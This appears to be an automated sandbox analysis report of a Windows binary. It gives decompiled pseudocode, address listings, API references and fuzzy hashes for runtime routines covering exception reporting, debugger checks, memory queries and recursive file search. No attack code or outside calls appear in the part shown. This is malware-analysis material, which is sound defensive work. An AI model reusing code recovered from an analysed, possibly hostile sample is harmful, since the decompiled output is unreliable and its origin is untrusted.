                                                    0x00cc307b
                                                    0x00cc307e
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3080
                                                    0x00cc3083
                                                    0x00cc3085
                                                    0x00cc3088
                                                    0x00cc3088
                                                    0x00cc308b
                                                    0x00cc30b7
                                                    0x00cc30b7
                                                    0x00cc30b7
                                                    0x00cc30be
                                                    0x00cc30c5
                                                    0x00cc30ca
                                                    0x00cc308d
                                                    0x00cc308f
                                                    0x00cc3092
                                                    0x00cc3092
                                                    0x00cc3095
                                                    0x00cc30a2
                                                    0x00cc30a4
                                                    0x00cc30aa
                                                    0x00cc30ac
                                                    0x00cc30af
                                                    0x00cc30af
                                                    0x00cc30af
                                                    0x00cc30b4
                                                    0x00000000
                                                    0x00cc30b4
                                                    0x00cc30cd
                                                    0x00cc30cd
                                                    0x00cc30ce
                                                    0x00cc30d1
                                                    0x00cc30d1
                                                    0x00cc30da
                                                    0x00000000
                                                    0x00cc30da
                                                    0x00cc3005
                                                    0x00cc2d69
                                                    0x00cc2d6b
                                                    0x00cc2d70
                                                    0x00cc2d74
                                                    0x00cc2d76
                                                    0x00cc2d83
                                                    0x00cc2d85
                                                    0x00000000
                                                    0x00cc2d85
                                                    0x00cc2d78
                                                    0x00cc2d7b
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2d7d
                                                    0x00000000
                                                    0x00cc2d7f
                                                    0x00000000
                                                    0x00cc2d44
                                                    0x00cc2d3d
                                                    0x00cc2cf4
                                                    0x00cc2cf6
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2cf8
                                                    0x00cc2cfa
                                                    0x00cc2cfc
                                                    0x00cc2cfc
                                                    0x00000000
                                                    0x00cc2ca0
                                                    0x00cc2ca0
                                                    0x00cc2ca0
                                                    0x00cc2ca3
                                                    0x00cc2cd9
                                                    0x00000000
                                                    0x00cc2cd9
                                                    0x00cc2ca6
                                                    0x00cc2ca6
                                                    0x00cc2ca9
                                                    0x00cc2ccd
                                                    0x00000000
                                                    0x00cc2ccd
                                                    0x00cc2cab
                                                    0x00cc2cab
                                                    0x00cc2cae
                                                    0x00cc2cc1
                                                    0x00cc2cc1
                                                    0x00000000
                                                    0x00cc2cc1
                                                    0x00cc2cb0
                                                    0x00cc2cb3
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2cb5
                                                    0x00000000
                                                    0x00cc2cb5
                                                    0x00cc2c9e
                                                    0x00cc2ba2
                                                    0x00cc2ba4
                                                    0x00cc2ba6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2ba6
                                                    0x00cc2b81
                                                    0x00cc2b83
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2b85
                                                    0x00cc2b88
                                                    0x00000000
                                                    0x00cc2b88
                                                    0x00cc2a4b
                                                    0x00cc2a4b
                                                    0x00cc2a4e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc2a55
                                                    0x00cc2a58
                                                    0x00cc2a8c
                                                    0x00cc2a93
                                                    0x00cc2a9b
                                                    0x00cc2aa3
                                                    0x00cc2ab2
                                                    0x00cc2aba
                                                    0x00cc2abd
                                                    0x00cc2ac3
                                                    0x00cc2ac9
                                                    0x00cc2acf
                                                    0x00cc2ad1
                                                    0x00cc2adb
                                                    0x00cc2adb
                                                    0x00cc2ae1
                                                    0x00cc2ae8
                                                    0x00cc2af6
                                                    0x00cc2af9
                                                    0x00cc2aff
                                                    0x00cc2aff
                                                    0x00000000
                                                    0x00cc2a5a
                                                    0x00cc2a5a
                                                    0x00cc2a64
                                                    0x00cc2a72
                                                    0x00cc2a78
                                                    0x00cc2a78
                                                    0x00000000
                                                    0x00cc2a64
                                                    0x00cc2a58
                                                    0x00cc29e7
                                                    0x00cc29ea
                                                    0x00cc29fa
                                                    0x00cc29fa
                                                    0x00000000
                                                    0x00cc29fa
                                                    0x00cc29ec
                                                    0x00cc29f3
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cc29f3
                                                    0x00cc29a5
                                                    0x00cc29a5
                                                    0x00cc29a8
                                                    0x00cc29c5
                                                    0x00cc29cb
                                                    0x00000000
                                                    0x00cc29cb
                                                    0x00cc29aa
                                                    0x00cc29aa
                                                    0x00cc29ad
                                                    0x00cc29b8
                                                    0x00cc29ba
                                                    0x00cc29ba
                                                    0x00cc29bb
                                                    0x00cc29c1
                                                    0x00000000
                                                    0x00cc29c1
                                                    0x00cc29af
                                                    0x00cc29b2
                                                    0x00000000
                                                    0x00cc29b4
                                                    0x00cc29b4
                                                    0x00000000
                                                    0x00cc29b4
                                                    0x00cc298f
                                                    0x00cc2991
                                                    0x00000000
                                                    0x00cc2991
                                                    0x00cc298d
                                                    0x00cc28af
                                                    0x00cc28b1
                                                    0x00cc28b3
                                                    0x00cc28b9
                                                    0x00000000
                                                    0x00cc28c5
                                                    0x00cc28c7
                                                    0x00cc28cb
                                                    0x00cc28dd
                                                    0x00cc28ea
                                                    0x00cc2908
                                                    0x00cc2919
                                                    0x00cc291e
                                                    0x00000000
                                                    0x00cc291e
                                                    0x00000000
                                                    0x00cc28ea

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC2874
                                                    • _strlen.LIBCMT ref: 00CC2E3F
                                                      • Part of subcall function 00CD02BA: __EH_prolog.LIBCMT ref: 00CD02BF
                                                      • Part of subcall function 00CD1B84: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,00CCBAE9,00000000,?,?,?,00010398), ref: 00CD1BA0
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CC2F91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog$ByteCharMultiUnothrow_t@std@@@Wide__ehfuncinfo$??2@_strlen
                                                    • String ID: CMT
                                                    • API String ID: 1206968400-2756464174
                                                    • Opcode ID: 90393e986017eafdb8abc97c81c7ab2fb9ebafef90a52767d266c3c0259390aa
                                                    • Instruction ID: 24fb1c7222b9835cfd24726184c91ee2a04b0024a47753a05fe04976cb6ef7d9
                                                    • Opcode Fuzzy Hash: 90393e986017eafdb8abc97c81c7ab2fb9ebafef90a52767d266c3c0259390aa
                                                    • Instruction Fuzzy Hash: 9F6207715002858FDF19DF78C895FEA3BA1EF54300F08857EECAA8B282D7759A45DB60
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDF838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00CDF838(intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, intOrPtr _a4) {
				char _v0;
				struct _EXCEPTION_POINTERS _v12;
				intOrPtr _v80;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v608;
				intOrPtr _v612;
				void* _v616;
				intOrPtr _v620;
				char _v624;
				intOrPtr _v628;
				intOrPtr _v632;
				intOrPtr _v636;
				intOrPtr _v640;
				intOrPtr _v644;
				intOrPtr _v648;
				intOrPtr _v652;
				intOrPtr _v656;
				intOrPtr _v660;
				intOrPtr _v664;
				intOrPtr _v668;
				char _v808;
				char* _t39;
				long _t49;
				intOrPtr _t51;
				void* _t54;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t58;
				intOrPtr _t59;
				intOrPtr* _t60;

				_t59 = __esi;
				_t58 = __edi;
				_t57 = __edx;
				if(IsProcessorFeaturePresent(0x17) != 0) {
					_t55 = _a4;
					asm("int 0x29");
				}
				E00CDFA46(_t34);
				 *_t60 = 0x2cc;
				_v632 = E00CDFFF0(_t58,  &_v808, 0, 3);
				_v636 = _t55;
				_v640 = _t57;
				_v644 = _t51;
				_v648 = _t59;
				_v652 = _t58;
				_v608 = ss;
				_v620 = cs;
				_v656 = ds;
				_v660 = es;
				_v664 = fs;
				_v668 = gs;
				asm("pushfd");
				_pop( *_t15);
				_v624 = _v0;
				_t39 =  &_v0;
				_v612 = _t39;
				_v808 = 0x10001;
				_v628 =  *((intOrPtr*)(_t39 - 4));
				E00CDFFF0(_t58,  &_v92, 0, 0x50);
				_v92 = 0x40000015;
				_v88 = 1;
				_v80 = _v0;
				_t28 = IsDebuggerPresent() - 1; // -1
				_v12.ExceptionRecord =  &_v92;
				asm("sbb bl, bl");
				_v12.ContextRecord =  &_v808;
				_t54 =  ~_t28 + 1;
				SetUnhandledExceptionFilter(0);
				_t49 = UnhandledExceptionFilter( &_v12);
				if(_t49 == 0 && _t54 == 0) {
					_push(3);
					return E00CDFA46(_t49);
				}
				return _t49;
			}


































                                                    0x00cdf838
                                                    0x00cdf838
                                                    0x00cdf838
                                                    0x00cdf84c
                                                    0x00cdf84e
                                                    0x00cdf851
                                                    0x00cdf851
                                                    0x00cdf855
                                                    0x00cdf85a
                                                    0x00cdf872
                                                    0x00cdf878
                                                    0x00cdf87e
                                                    0x00cdf884
                                                    0x00cdf88a
                                                    0x00cdf890
                                                    0x00cdf896
                                                    0x00cdf89d
                                                    0x00cdf8a4
                                                    0x00cdf8ab
                                                    0x00cdf8b2
                                                    0x00cdf8b9
                                                    0x00cdf8c0
                                                    0x00cdf8c1
                                                    0x00cdf8ca
                                                    0x00cdf8d0
                                                    0x00cdf8d3
                                                    0x00cdf8d9
                                                    0x00cdf8e8
                                                    0x00cdf8f4
                                                    0x00cdf8ff
                                                    0x00cdf906
                                                    0x00cdf90d
                                                    0x00cdf918
                                                    0x00cdf920
                                                    0x00cdf929
                                                    0x00cdf92b
                                                    0x00cdf92e
                                                    0x00cdf930
                                                    0x00cdf93a
                                                    0x00cdf942
                                                    0x00cdf948
                                                    0x00000000
                                                    0x00cdf94f
                                                    0x00cdf952

                                                    APIs
                                                    • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00CDF844
                                                    • IsDebuggerPresent.KERNEL32 ref: 00CDF910
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00CDF930
                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 00CDF93A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                    • String ID:
                                                    • API String ID: 254469556-0
                                                    • Opcode ID: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                    • Instruction ID: 6fcebeddfc2d6d0ae72d75bc2219cba86a1bef691bc648703e298b4e918354f1
                                                    • Opcode Fuzzy Hash: 7cf94cbc9fc8af74227aca1d3c7f7dbc9681c427b025e67e83f0adc2bd57c167
                                                    • Instruction Fuzzy Hash: 9A310575D05219ABDB21DFA4D989BCCBBB8BF08304F1040AAE50DAB350EB719B85DF45
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDE6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 83%
                                                    			E00CDE6A3(signed int _a4, signed int _a8) {
				struct _MEMORY_BASIC_INFORMATION _v32;
				struct _SYSTEM_INFO _v68;
				long _t20;
				signed int _t28;
				void* _t30;
				signed int _t32;
				signed int _t40;
				signed int _t45;

				_t20 = VirtualQuery(_a4,  &_v32, 0x1c);
				if(_t20 == 0) {
					_push(0x19);
					asm("int 0x29");
				}
				if((_v32.Protect & 0x00000044) != 0) {
					GetSystemInfo( &_v68);
					_t40 = _v68.dwPageSize;
					_t32 = _t40 - 1;
					_t45 =  !_t32 & _a4;
					_t28 = _a8 / _t40;
					_t30 = ((_t32 & _a4) + _t40 + (_t32 & _a8) - 1) / _t40 + _t28;
					if(_t30 == 0) {
						L5:
						return _t28;
					} else {
						goto L4;
					}
					do {
						L4:
						_t28 = 0;
						asm("lock or [esi], eax");
						_t45 = _t45 + _t40;
						_t30 = _t30 - 1;
					} while (_t30 != 0);
					goto L5;
				}
				return _t20;
			}











                                                    0x00cde6b4
                                                    0x00cde6bc
                                                    0x00cde6be
                                                    0x00cde6c1
                                                    0x00cde6c1
                                                    0x00cde6c7
                                                    0x00cde6cf
                                                    0x00cde6d5
                                                    0x00cde6d8
                                                    0x00cde6ea
                                                    0x00cde6fa
                                                    0x00cde6fc
                                                    0x00cde6fe
                                                    0x00cde70c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cde700
                                                    0x00cde700
                                                    0x00cde700
                                                    0x00cde702
                                                    0x00cde705
                                                    0x00cde707
                                                    0x00cde707
                                                    0x00000000
                                                    0x00cde700
                                                    0x00cde70f

                                                    APIs
                                                    • VirtualQuery.KERNEL32(80000000,00CDE5E8,0000001C,00CDE7DD,00000000,?,?,?,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6B4
                                                    • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00CDE5E8,00000004,00D21CEC,00CDE86D), ref: 00CDE6CF
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: InfoQuerySystemVirtual
                                                    • String ID: D
                                                    • API String ID: 401686933-2746444292
                                                    • Opcode ID: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                    • Instruction ID: f26e6ca273113e2141d5a8a97f57c9286f3e72418a144a8afff28d1bdc046691
                                                    • Opcode Fuzzy Hash: 94f96072df3cf765b2baa05dc1aa45b6768562f803a3e4a90b6aa93d91978387
                                                    • Instruction Fuzzy Hash: AF01DB726001096BDF14EE29DC49BED7BBAEFC4324F0DC125EE69DB254D634DA05C690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CE8EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    C-Code - Quality: 79%
                                                    			E00CE8EBD(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				intOrPtr _v808;
				char _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				intOrPtr _t49;
				intOrPtr _t60;
				intOrPtr _t61;
				intOrPtr _t65;
				intOrPtr _t66;
				int _t67;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t65 = __edx;
				_t60 = __ebx;
				_t40 =  *0xcfe7ac; // 0x349e4b74
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E00CDFA46(_t41);
					_pop(_t61);
				}
				E00CDFFF0(_t66,  &_v804, 0, 0x50);
				E00CDFFF0(_t66,  &_v724, 0, 0x2cc);
				_v812 =  &_v804;
				_t47 =  &_v724;
				_v808 = _t47;
				_v548 = _t47;
				_v552 = _t61;
				_v556 = _t65;
				_v560 = _t60;
				_v564 = _t68;
				_v568 = _t66;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t25 =  &_v0; // 0x7
				_t49 = _t25;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t67 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t36 =  &_v812; // -805
				if(UnhandledExceptionFilter(_t36) == 0 && _t67 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E00CDFA46(_t57);
				}
				return E00CDFBBC(_t57, _t60, _v8 ^ _t69, _t65, _t67, _t68);
			}






































                                                    0x00ce8ebd
                                                    0x00ce8ebd
                                                    0x00ce8ebd
                                                    0x00ce8ec8
                                                    0x00ce8ecd
                                                    0x00ce8ecf
                                                    0x00ce8ed7
                                                    0x00ce8ed9
                                                    0x00ce8edc
                                                    0x00ce8ee1
                                                    0x00ce8ee1
                                                    0x00ce8eed
                                                    0x00ce8f00
                                                    0x00ce8f0e
                                                    0x00ce8f14
                                                    0x00ce8f1a
                                                    0x00ce8f20
                                                    0x00ce8f26
                                                    0x00ce8f2c
                                                    0x00ce8f32
                                                    0x00ce8f38
                                                    0x00ce8f3e
                                                    0x00ce8f44
                                                    0x00ce8f4b
                                                    0x00ce8f52
                                                    0x00ce8f59
                                                    0x00ce8f60
                                                    0x00ce8f67
                                                    0x00ce8f6e
                                                    0x00ce8f6f
                                                    0x00ce8f78
                                                    0x00ce8f7e
                                                    0x00ce8f7e
                                                    0x00ce8f81
                                                    0x00ce8f87
                                                    0x00ce8f94
                                                    0x00ce8f9d
                                                    0x00ce8fa6
                                                    0x00ce8faf
                                                    0x00ce8fbd
                                                    0x00ce8fbf
                                                    0x00ce8fc5
                                                    0x00ce8fd4
                                                    0x00ce8fe0
                                                    0x00ce8fe3
                                                    0x00ce8fe8
                                                    0x00ce8ff7

                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00CE8FB5
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00CE8FBF
                                                    • UnhandledExceptionFilter.KERNEL32(-00000325,?,?,?,?,?,00000000), ref: 00CE8FCC
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                    • Instruction ID: 118f242b147a4089c9d29f1e4edc54909f5b5d399a371ad9a92371d69eb81af4
                                                    • Opcode Fuzzy Hash: 4241b8401ba2270a213ed99c23e3dfaaec0f5d930f35ccbc0a582ba7799402cc
                                                    • Instruction Fuzzy Hash: 1231C275901228ABCB21DF65DC89BDDBBB8BF08310F5041EAE41CA7250EB709F858F55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CEB348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 71%
                                                    			E00CEB348(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr* _v32;
				CHAR* _v36;
				signed int _v48;
				char _v286;
				signed int _v287;
				struct _WIN32_FIND_DATAA _v332;
				intOrPtr* _v336;
				signed int _v340;
				signed int _v344;
				intOrPtr _v372;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t40;
				signed int _t43;
				intOrPtr _t45;
				signed char _t47;
				intOrPtr* _t55;
				union _FINDEX_INFO_LEVELS _t57;
				union _FINDEX_INFO_LEVELS _t58;
				signed int _t62;
				signed int _t65;
				void* _t71;
				void* _t73;
				signed int _t74;
				void* _t77;
				CHAR* _t78;
				void* _t79;
				intOrPtr* _t82;
				intOrPtr _t84;
				void* _t86;
				intOrPtr* _t87;
				signed int _t91;
				signed int _t95;
				void* _t100;
				signed int _t103;
				union _FINDEX_INFO_LEVELS _t104;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr _t110;
				void* _t111;
				void* _t112;
				signed int _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				void* _t120;

				_push(__ecx);
				_t82 = _a4;
				_t2 = _t82 + 1; // 0x1
				_t100 = _t2;
				do {
					_t35 =  *_t82;
					_t82 = _t82 + 1;
				} while (_t35 != 0);
				_t103 = _a12;
				_t84 = _t82 - _t100 + 1;
				_v8 = _t84;
				if(_t84 <= (_t35 | 0xffffffff) - _t103) {
					_t5 = _t103 + 1; // 0x1
					_t77 = _t5 + _t84;
					_t109 = E00CEB136(_t84, _t77, 1);
					_t86 = _t108;
					__eflags = _t103;
					if(_t103 == 0) {
						L6:
						_push(_v8);
						_t77 = _t77 - _t103;
						_t40 = E00CEF101(_t86, _t109 + _t103, _t77, _a4);
						_t118 = _t117 + 0x10;
						__eflags = _t40;
						if(__eflags != 0) {
							goto L9;
						} else {
							_t71 = E00CEB587(_a16, _t100, __eflags, _t109);
							E00CE8DCC(0);
							_t73 = _t71;
							goto L8;
						}
					} else {
						_push(_t103);
						_t74 = E00CEF101(_t86, _t109, _t77, _a8);
						_t118 = _t117 + 0x10;
						__eflags = _t74;
						if(_t74 != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00CE9097();
							asm("int3");
							_t116 = _t118;
							_t119 = _t118 - 0x150;
							_t43 =  *0xcfe7ac; // 0x349e4b74
							_v48 = _t43 ^ _t116;
							_t87 = _v32;
							_push(_t77);
							_t78 = _v36;
							_push(_t109);
							_t110 = _v332.cAlternateFileName;
							_push(_t103);
							_v372 = _t110;
							while(1) {
								__eflags = _t87 - _t78;
								if(_t87 == _t78) {
									break;
								}
								_t45 =  *_t87;
								__eflags = _t45 - 0x2f;
								if(_t45 != 0x2f) {
									__eflags = _t45 - 0x5c;
									if(_t45 != 0x5c) {
										__eflags = _t45 - 0x3a;
										if(_t45 != 0x3a) {
											_t87 = E00CEF150(_t78, _t87);
											continue;
										}
									}
								}
								break;
							}
							_t101 =  *_t87;
							__eflags = _t101 - 0x3a;
							if(_t101 != 0x3a) {
								L19:
								_t104 = 0;
								__eflags = _t101 - 0x2f;
								if(_t101 == 0x2f) {
									L23:
									_t47 = 1;
									__eflags = 1;
								} else {
									__eflags = _t101 - 0x5c;
									if(_t101 == 0x5c) {
										goto L23;
									} else {
										__eflags = _t101 - 0x3a;
										if(_t101 == 0x3a) {
											goto L23;
										} else {
											_t47 = 0;
										}
									}
								}
								_t89 = _t87 - _t78 + 1;
								asm("sbb eax, eax");
								_v340 =  ~(_t47 & 0x000000ff) & _t87 - _t78 + 0x00000001;
								E00CDFFF0(_t104,  &_v332, _t104, 0x140);
								_t120 = _t119 + 0xc;
								_t111 = FindFirstFileExA(_t78, _t104,  &_v332, _t104, _t104, _t104);
								_t55 = _v336;
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									_t91 =  *((intOrPtr*)(_t55 + 4)) -  *_t55;
									__eflags = _t91;
									_t92 = _t91 >> 2;
									_v344 = _t91 >> 2;
									do {
										__eflags = _v332.cFileName - 0x2e;
										if(_v332.cFileName != 0x2e) {
											L36:
											_push(_t55);
											_t57 = E00CEB348(_t92,  &(_v332.cFileName), _t78, _v340);
											_t120 = _t120 + 0x10;
											__eflags = _t57;
											if(_t57 != 0) {
												goto L26;
											} else {
												goto L37;
											}
										} else {
											_t92 = _v287;
											__eflags = _t92;
											if(_t92 == 0) {
												goto L37;
											} else {
												__eflags = _t92 - 0x2e;
												if(_t92 != 0x2e) {
													goto L36;
												} else {
													__eflags = _v286;
													if(_v286 == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L40;
										L37:
										_t62 = FindNextFileA(_t111,  &_v332);
										__eflags = _t62;
										_t55 = _v336;
									} while (_t62 != 0);
									_t101 =  *_t55;
									_t95 = _v344;
									_t65 =  *((intOrPtr*)(_t55 + 4)) -  *_t55 >> 2;
									__eflags = _t95 - _t65;
									if(_t95 != _t65) {
										E00CE6310(_t78, _t101 + _t95 * 4, _t65 - _t95, 4, E00CEB1A0);
									}
								} else {
									_push(_t55);
									_t57 = E00CEB348(_t89, _t78, _t104, _t104);
									L26:
									_t104 = _t57;
								}
								__eflags = _t111 - 0xffffffff;
								if(_t111 != 0xffffffff) {
									FindClose(_t111);
								}
								_t58 = _t104;
							} else {
								__eflags = _t87 -  &(_t78[1]);
								if(_t87 ==  &(_t78[1])) {
									goto L19;
								} else {
									_push(_t110);
									_t58 = E00CEB348(_t87, _t78, 0, 0);
								}
							}
							_pop(_t105);
							_pop(_t112);
							__eflags = _v12 ^ _t116;
							_pop(_t79);
							return E00CDFBBC(_t58, _t79, _v12 ^ _t116, _t101, _t105, _t112);
						} else {
							goto L6;
						}
					}
				} else {
					_t73 = 0xc;
					L8:
					return _t73;
				}
				L40:
			}






















































                                                    0x00ceb34d
                                                    0x00ceb34e
                                                    0x00ceb351
                                                    0x00ceb351
                                                    0x00ceb354
                                                    0x00ceb354
                                                    0x00ceb356
                                                    0x00ceb357
                                                    0x00ceb361
                                                    0x00ceb364
                                                    0x00ceb367
                                                    0x00ceb36c
                                                    0x00ceb375
                                                    0x00ceb378
                                                    0x00ceb382
                                                    0x00ceb385
                                                    0x00ceb386
                                                    0x00ceb388
                                                    0x00ceb39c
                                                    0x00ceb39c
                                                    0x00ceb39f
                                                    0x00ceb3a9
                                                    0x00ceb3ae
                                                    0x00ceb3b1
                                                    0x00ceb3b3
                                                    0x00000000
                                                    0x00ceb3b5
                                                    0x00ceb3b9
                                                    0x00ceb3c2
                                                    0x00ceb3c8
                                                    0x00000000
                                                    0x00ceb3cb
                                                    0x00ceb38a
                                                    0x00ceb38a
                                                    0x00ceb390
                                                    0x00ceb395
                                                    0x00ceb398
                                                    0x00ceb39a
                                                    0x00ceb3d1
                                                    0x00ceb3d3
                                                    0x00ceb3d4
                                                    0x00ceb3d5
                                                    0x00ceb3d6
                                                    0x00ceb3d7
                                                    0x00ceb3d8
                                                    0x00ceb3dd
                                                    0x00ceb3e1
                                                    0x00ceb3e3
                                                    0x00ceb3e9
                                                    0x00ceb3f0
                                                    0x00ceb3f3
                                                    0x00ceb3f6
                                                    0x00ceb3f7
                                                    0x00ceb3fa
                                                    0x00ceb3fb
                                                    0x00ceb3fe
                                                    0x00ceb3ff
                                                    0x00ceb420
                                                    0x00ceb420
                                                    0x00ceb422
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb407
                                                    0x00ceb409
                                                    0x00ceb40b
